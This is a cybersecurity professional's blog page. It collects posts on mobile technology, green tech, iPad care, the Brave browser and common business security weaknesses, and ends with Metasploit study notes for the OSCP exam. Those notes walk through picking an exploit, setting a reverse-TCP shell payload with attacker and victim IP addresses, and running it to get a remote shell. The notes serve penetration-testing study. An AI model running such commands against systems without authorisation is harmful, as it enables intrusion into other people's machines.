Will Chatham is a Cyber Security Analyst, Ethical Hacker, and Penetration Tester at a data center in Asheville, NC. Since Netscape 2.0, he has worked in a wide array of environments including non-profit, corporate, small business, and government. His varied background, from developer to search engine optimizer to security professional, has helped him build a wide range of skills that help those with whom he works and teaches.

Find more about me on:

Here are my most recent posts

About Will Chatham

Will Chatham is a Cyber Security Analyst, Ethical Hacker, and Penetration Tester at a data center in Asheville, NC. Since Netscape 2.0, he has worked in a wide array of environments including non-profit, corporate, small business, and government. His varied background, from developer to search engine optimizer to security professional, has helped him build a wide range of skills that help those with whom he works and teaches.

Mobile Tech: The Past, Present, And Future

Mobile tech is a huge talking point for anyone that loves technology. What we want to do today is take a look at its past, present, and future. What was mobile tech like a decade or so ago? What’s it like now? And, what will it be like in the future? Find all this out here:

Past

In the past, mobile technology was incredibly simple. It was all about creating a device that you can carry around with you to send messages and make calls.

Then, it evolved to a device that allowed you to take pictures and access the internet. In the past, if your phone has internet connectivity, it was seen as something quite remarkable.

Mobile technology was very basic when it first burst on the scene, but things have definitely changed since then, as you will see in the section below.

Present

We’re currently living in a world that is absolutely dominated by mobile technology. The smartphone boom is real, and everyone has at least one mobile device of some sort. Perhaps the key piece of mobile tech right now has to be apps. Mobile apps are huge, they’re useful across so many different industries, and there’s an app for just about anything. It feels like if you have an idea, you just need to find a mobile app company and they can turn that idea into an app. Apps bring people closer to businesses and news outlets because an app sends notifications and provide people with updated information without them having to do anything.

As well as mobile apps we see loads of other tech related things too, such as biometric scanning and incredibly cameras. Most phones now come equipped with fingerprint scanners as an added security measure. Likewise, most mobile devices also have cameras capable of shooting pictures and videos in extremely high-quality resolutions – we’ve even seen a 4k smartphone camera!

To sum up, there are loads of current trends in mobile technology. Apps are huge from a business standpoint, whereas security and cameras are big things from the consumer view. We’re also seeing a few trends that are laying the foundations for future mobile tech, and they’ll be discussed below.

Future

It’s always difficult to predict the future, but we can be fairly certain of a few future mobile tech trends. Most notably; virtual and augmented reality. Mobile devices will soon all be compatible with virtual reality headset, and that will be reflected in the new types of games and apps that are developed.

Similarly, augmented reality will be a huge thing from an app developer standpoint too. We’ve already seen augmented reality games like Pokemon Go be a huge hit. In a few years, most apps will try and integrate augmented reality in some way.

How can we be sure of this? Because there are already a few smartphones and developers that are getting on this trend. Just look at Samsung and their VR headset, or Google and their Google Cardboard.

As you can see, mobile technology has come a long way since its inception. Even though things are very advanced now, it looks like there’s still a very bright future too.

Technology Can Save the World!

For a lot of people, we’re living in pretty scary times. Climate change is the sort of thing that seems so huge that it often feels as though there’s pretty much nothing that we can do about it. For some, the solution is just to avoid thinking about it, something that is certainly not going to do anyone any good! But that doesn’t mean that you should just be constantly worrying about it either. In fact, there are some things that are making a real difference to our impact on the environment, and many of those things are coming from the world of technology. There has been a major push over the last few years toward tech that can help work against the damage that has been done to the planet. So, in the spirit of helping people feel a little bit more positive about the world we live in, here are some amazing ways that technology is saving the world.

Solar power

It’s truly amazing that such an incredible, renewable source of power and energy has been right under our noses for so long. Of course, the problem for the longest time has been how to actually harness that power in a useful and productive way. Over the last couple of decades, there have been some incredible advances in solar technology, but there are some that are just around the corner that just might revolutionize it all over again. Things like solar windows have shown that it’s possible to integrate solar cells into all manner of items. Check out this article on powertechnology.com to find out more about the incredible things that solar windows can do. Within the next couple of decades, solar cells could be incorporated into pretty much anything: homes, clothes; you name it!

Electric vehicles

Let’s face it, the burning of fossil fuels is the major source of humanities major impact on climate change. Of course, a great deal of that impact is down to large companies, factories, and industries, but that doesn’t mean there isn’t also an impact on a more personal level. The vehicles that we drive have undoubtedly had an impact on the environment. The issue is that we simply need our vehicles to get around. That’s where companies like theelectricrider.com come in. By producing affordable electric vehicles, companies like this are making clean, energy efficient transport available to far more people than ever before.

Nuclear energy

A lot of people tend to feel very odd at even the slightest mention of nuclear energy. The image of radioactive disasters and massive levels of destruction end up coloring people’s opinions despite the fact that it has the potential to be an incredibly clean, renewable resource. There are now new types of reactors that are designed to turn nuclear waste into power. We’re not quite at the level of nuclear fusion yet, but many of these fission reactors are far safer and more viable than anyone could have ever predicted. Many of these reactors aim to put the fears and concerns that many people have about nuclear energy to bed permanently.

The iPad Health Dump

The Ipad has literally changed the way of entertainment over the last few years. First, it received some criticism. Some saying it was just a big phone without the phone, and that there are various security issues with it. However, it has stood the test of time and it has become a grade a companion for millions of people across the world. The Ipad is used expertly by many, but there are still some areas of concern for some. So, here are some hints and tips that can not only help you get the best out of your Ipad, but to keep it safe too.

Use A Case

So many people don’t use cases or screen protectors. Their size makes them more vulnerable to a drop than a phone. Make sure you protect it. Get a solid back case that wraps around when not in use. You can use a screen protector too if you wish to keep the screen free from scratches and abrasions. You can find some cool cases at ithingum.com. Depending on what you use it for dictates the case needed. For example if you work on a construction site get something solid and hard, but if you use it around the house something softer is fine. Don’t ruin your Ipad by a silly drop. Mistakes are made, so try to protect it as much as you can.

Virus Protection

Staying with protection, you also need to protect it from external threats. Many people think their phones and tablets aren’t at risk from viruses, but they are essentially computers and as a result can become affected just the same. You open a dodgy email attachment that has been designed to attack IOS then you could be in trouble. They have built in security, but you would be better off using software to protect it from attack. You could lose all kinds of photos, messages, and other memories if you haven’t backed it up in some time. Here are some of the better security apps you can make the most of.

Don’t Leave It In Direct Sunlight

You may have seen the message that comes up. Warning that the system cannot work because it is too hot. This is a great addition by Apple that can stop it breaking, but remember, it still gets damaged. Doing this can sizzle the internal components. You may not notice anything right away, but over time it make become sluggish and not charge properly. Don’t leave it in direct sunlight because it will be damaged, if you have to keep it face down and ensure it is under a cover for enhanced shade.

Charge It Right

Try to ensure you charge the device right so that it doesn’t lose charge over time. The newer products are better but if you have an older one and you don’t charge properly you could end up losing huge chunks of it. This is why sometimes it jumps from certain numbers down to one or two, simply because the device is confused. You can find the correct charging methods from Apple themselves.

Just In Time, the Brave Browser Becomes My Default

Last night I saw a respected security professional I follow on Twitter mention the Brave web browser, and how good he thought the mobile version is. Brave was started by the Mozilla Project co-founder Brandon Eich, and is based on Chromium, the open-source base that Google Chrome is constructed upon.

Today, I caught wind that Chrome is soon going to prevent you from doing things such as disabling its DRM management feature called Widevine. The problem with this is summarized here:

…a single browser may now require two different DRM plugins to play all DRM content. These plugins have their own security issues, but unlike with the Flash vulnerabilities, security researchers are banned from looking for them, due to Section 1201 of the Digital Millennium Copyright Act (DMCA). That means malicious hackers, who already engage in other criminal activities, may freely take advantage of all the vulnerabilities they find in these DRM plugins before companies discover them on their own.

In short, because of the closed nature of the DMCA, we end users are at risk unnecessarily, and we will soon have no ability to disable this plugin should we wish to do so.

Enter The Brave

Brave offers a browser that works on all platforms (Windows, Mac, Linux) and on mobile. It blocks ads by default, blocks malware, and is lean and fast. Putting user privacy and security at the forefront, along with speed, this thing is a powerhouse as it forces https on websites and prevents malware-serving advertisement networks from invading your workspace.

But the difference is the paradigm shift in supporting advertisers, as opposed to simply blocking them out completely:

Brave intends to keep 15% of ad revenue for itself, pay content publishers 55%, ad partners 15% and also give 15% to the browser users, who can in turn donate to bloggers and other providers of web content through micropayments.

I have yet to figure out how or if that will work, exactly, and it doesn’t seem to be fully impemented in the browser yet, but it seems like a great way to solve the elephant-in-the-room problem the Internet faces today: how to earn money and keep users safe at the same time, so that they don’t need to run ad blockers and anti-tracking plugins?

Stay tuned for more info as I learn it, and as I figure out Brave.

Read Now If Your Employees Are Using 123RandomWord As Their Password

Ever since the internet rose up from the mists of nowhere, security breaches have been a source of big news, terrifying news. Whether it is the likes of Yahoo being hacked, or Election Results being tampered with, hacking scandals seem to be rearing their ugly heads more often than not. We read story after story about security leaks and each one ends with the same paragraph, the same foregone conclusion; businesses and business leaders need to up their game when it comes to protecting the sensitive data they hold. That is the common message from security experts, and yet so many businesses still don’t prepare themselves properly. Because they have been targeted and affected, they don’t take it seriously enough to seek out the weak links in their business, research the most recent trend in threats, and thus fail to protect themselves and their clients/customers from any breach.

Don’t believe us? Well, the recent State of Risk report concluded that a majority of businesses – big and small – have not invested in a system that will protect, control and track the sensitive data they have been entrusted with. The majority have no or only a partial, system in place. Trust us, if Yahoo is struggling to hold their defensive line against hackers then, chances are, you are going to struggle too. That’s why it is imperative to invest in security. Put it this way, the average cost incurred by a cyber breach on a small or medium sized business is £325,000.

I thought that would grab your attention.

So what preventative measures can you take? How do you best protect yourself and your customers? How do you make sure you are doing all you can to prevents a security breach? How do you stop your sensitive data getting into the wrong hands? Well, we have conducted thorough interviews with security experts to hear what they say, and have compiled a list of the most common areas of weakness in most businesses.

  1. On The Go Tech

In the early 90s and before, a data hack would mean someone would have to hack into your servers or break into your premises in order to access your sensitive data. But these days are gone, and data theft has been made so much simpler by the rise in mobile technology. Simply put, mobile devices increase your vulnerability and thus increase the risk. Of course, mobile devices are a must-have for all employees these days because it increases flexibility and productivity, and reduces the issue of wasted time and resource. However, the more your employees use these devices to share data and access your servers or fail to change their passwords, the more risk you are at. In fact, mobile breaches account for almost three-quarters of all breaches, a rise that mimics the rise of the bring your device to work policy that so many companies are embracing.

As such, it is imperative that you renew your BYOD policy so that it carefully spells out certain rules and expectations. This will better educate your workforce on the risks. A great way to make this more effective is to relate security breaches at work to the risks they face at home; make it relatable to personal risks like using ATM machines. You should also ensure that you have the capabilities to better monitor mobile devices. This way you will be able to quickly pinpoint any breach or any weakness.

  1. Uneducated Employees

We don’t mean uneducated in terms of schooling, we mean uneducated regarding security, and that means your training program is letting them down. But, yes, all too often your employees are a security risk. It could be that employee leaves their laptop on a table in Costa as they nip to the bathroom, or a smartphone gets left on the subway, or in a taxi. All of these pose serious threats to your security. But it is not just about exposure outside the office. Too many employees are not educated on the importance of a strong password, what constitutes a strong password or how often they should change their password. This leaves you exposed on the inside. The same goes for training on what to look out for when it comes to suspicious emails.

Cyber attacks have got more and more sophisticated. The phishing techniques have improved, spear fishing is now called upon, unauthorized websites are now able to install malware without the user knowing, and all of these pose a serious threat to both your systems and your data. That is why training is so important, and regular training too, as this will allow you to renew their understanding as different trends arise. A great way to do this is to approach digital learning companies who have experience in this kind of training. This will offer you a cost-effective means of training that is not just interactive and engaging but offers an audit trail too. They will know how to teach your employees about passwords, phishing, keylogging and much more.

  1. Inside Jobs

It is hard to say exactly where an internal attack originates, but it is typically unhappy or disgruntled employees. What’s more, these account for a seriously high number of breaches. Of course, any inside attack will require in-depth knowledge of your IT systems and will require someone to have access to all areas of your network, which is why most inside attacks come from within the IT Department. A disgruntled employee working within IT support can create a huge amount of problems.

How you can prevent this weakness is a challenge, but it requires mitigating any chance of employees in this sector becoming disgruntled. This is not always possible, so it is crucial you identify all those that have access to all areas of the server, this way you will be able to act quickly should an event happen. Another step should be to terminate access to anyone that no longer works within this capacity as soon as possible.

  1. The Cloud

The most effective way to protect all data that is stored in the cloud is to encrypt any access at ground level. Different experts suggest different encryption software, but all suggestions usually represent the gold standard in this field. We can’t stress enough the importance of investing in this kind of security. Since the cloud first originated, a high proportion of cyber attacks have been made possible by companies not using data level encryption devices to protect data stored up high, so make sure you invest well and invest fast.

  1. Third Parties

There are a few reasons why outsourcing has become more and more attractive. It is cost-effective, it frees up resource time, it allows experts to address what is becoming a more and more complex area. It could be you outsource the maintenance of your server, or your point of sale system, or a myriad of other things. However, while they may be experts in protecting you, third-party providers sometimes don’t follow best-practices themselves. It may be they use one password to connect to all of their clients, for example, which poses a threat should that password be hacked.
As such, you should always ask as many questions as you possibly can. Make sure they follow the best practices of remote access security, and enforce stringent policies for their workforce to uphold, and use sophisticated authentication techniques to ensure there are unique credentials required for each user. The other step you must take is to know which third parties you are using and then terminate their access as soon as their contract runs out or as soon as they no longer require access.

Quick Metasploit Guide

metasploit photoThese are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb

Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack

Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim
msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:
msf> set RPORT 8081

Run the exploit:
msf> exploit

If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:
ls

dir

pwd

id

Photos by Christiaan008,